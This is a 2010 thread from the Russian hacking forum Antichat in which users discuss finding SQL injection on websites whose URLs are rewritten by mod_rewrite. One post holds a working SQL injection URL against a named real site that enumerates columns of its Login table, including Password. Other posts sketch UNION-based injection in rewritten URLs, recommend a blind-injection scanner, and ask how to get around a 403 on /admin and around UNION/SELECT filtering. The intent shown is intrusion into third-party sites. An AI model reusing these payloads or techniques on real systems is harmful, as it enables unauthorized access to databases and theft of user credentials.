ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.09.2010, 00:56
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Gorev
ну да, недавно было тема об этом mod_rewrite , сказали, что тлько фаззингом можно раскрывать пути вроде.
а как насчет этих:
Сообщение от None
все линки кончаются на *.htm , *.aspx или .html.
это уж точно не mod_rewrite !
|
|
|
15.09.2010, 01:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Сообщение от None
B1t.exe
Постоянный
Регистрация: 06.11.2006
ты аккаунт купил или реально с 2006 года в очаде ? =\
голый html сайт собрался инъектировать ? 0_о
а вот тебе насчет aspx пример
Сообщение от None
http://news.uzex.com/gazeta/index.aspx?id=133%20or%20133=(SELECT+TOP+1+COLUMN_ NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_N AME='Login'+AND+COLUMN_NAME+NOT+IN+('Author','Auth orEmail','BirCena','CH','CH_location','CurrentCats ','CurrentName','DateDisplay','DateIzd','DateLogon ','DatePost','DatePosted','EN','EN_location','Emai l','F1','F2','F3','F4','F5','F6','F7','F8','F9','F 10','F11','F12','F13','F14','F15','FileName_','Ful lContent','Headline','Host','IP','ImageName_','IsA ctive','LoginName_','Message','MiniContent','Name' ,'NameLogin','Number_','Password','PathName_','Pos ition','RU','RU_location','RozCena','Sticky','Type ','URL','UZ','UZ_location','UserLevel','adrr'))--
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
15.09.2010, 03:22
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от B1t.exe
B1t.exe said:
это уж точно не mod_rewrite !
Почему ты так уверен, что это точно не Mod_Rewrite?
URL можно преобразовать, как угодно и расширение, там может быть любое.
Вот пример:
Код HTML:
HTML:
http://www.realcoding.net/news/v-sql-server-katmai-ne-budet-ozhidaemykh-funktsii-winfs.html
Ты думаешь сайт написан на статическом html, а статьи обновляются вручную без базы данных?
Это ничто иное, как php + mysql.
Самый простой и не "хакерский" способ, смотрим заголовки сниффера:
Код:
Code:
Server[Apache/2.0.63 (CentOS)]
X-Powered-By[PHP/5.2.9]
Ну и исходный код статьи:
Код:
Code:
http://www.realcoding.net/redir.php?url=http://www.thevista.ru
|
|
|
|
15.09.2010, 15:31
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Redwood
хмм.. вот как значит.. все же Mod_Rewrite так активно исползуется в многих сайтах ?
а там как можно искать SQL иньекции ? только только фаззинг и сканирование портов ? ((
|
|
|
|
15.09.2010, 15:40
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
shell_c0de
не надо гонять тут на меня. стариков хоть уважать надо.
не зная SQL - не значит, что акк купил.
я тут с времени империализма.
а то, то я написал по поводу html, то точно знаю, что там есть SQL база и наверно PHP тоже.
вот смотри пост redwood и поймешь, что на самом деле сайт то не голый...
|
|
|
|
15.09.2010, 15:51
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от B1t.exe
B1t.exe said:
Redwood
хмм.. вот как значит.. все же
Mod_Rewrite
так активно исползуется в многих сайтах ?
а там как можно искать SQL иньекции ? только только фаззинг и сканирование портов ?
((
www.site.com/news=123(SQL injection).html
примерно так
П.С. Уважение зарабатывается не возрастом ..а делами которые ты сделал
|
|
|
|
15.09.2010, 17:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
2B1t.exe ну хз как бэ сорри если что =\
кстати юзай еще прогу от Seravin'a BSQLi_v.1.2 он тоже прочекает все твои ссылки на скули
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
15.09.2010, 20:29
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
при переходе в какую-нибудь диру пишет:
You don't have permission to access /admin on this server.
чем спастись от этого?
|
|
|
|
15.09.2010, 20:42
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Gorev
Сообщение от None
www.site.com/news=123(SQL injection).html
типа www.site.com/news=123& photo=2+UNION+ALL+SELECT+1,2,3,4,5.....html
типа того?
Сообщение от None
П.С. Уважение зарабатывается не возрастом ..а делами которые ты сделал
Ну и не надо обсирать.
shell_c0de
читал в топике. тип пишет, что helper лучше вроде. ну написал в теме. ТС если обновит и с виде выложит - сакчаю и буду юзать.
|
|
|
|
15.09.2010, 20:45
|
|
Познающий
Регистрация: 20.07.2007
Сообщений: 99
Провел на форуме:
1562993
Репутация:
25
|
|
Народ если я делаю подбор кол-ва колонок по group by а потом делаю запрос с юнионом мне форбиден к скрипту вылетает - это фильтрация юнион и селекта?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
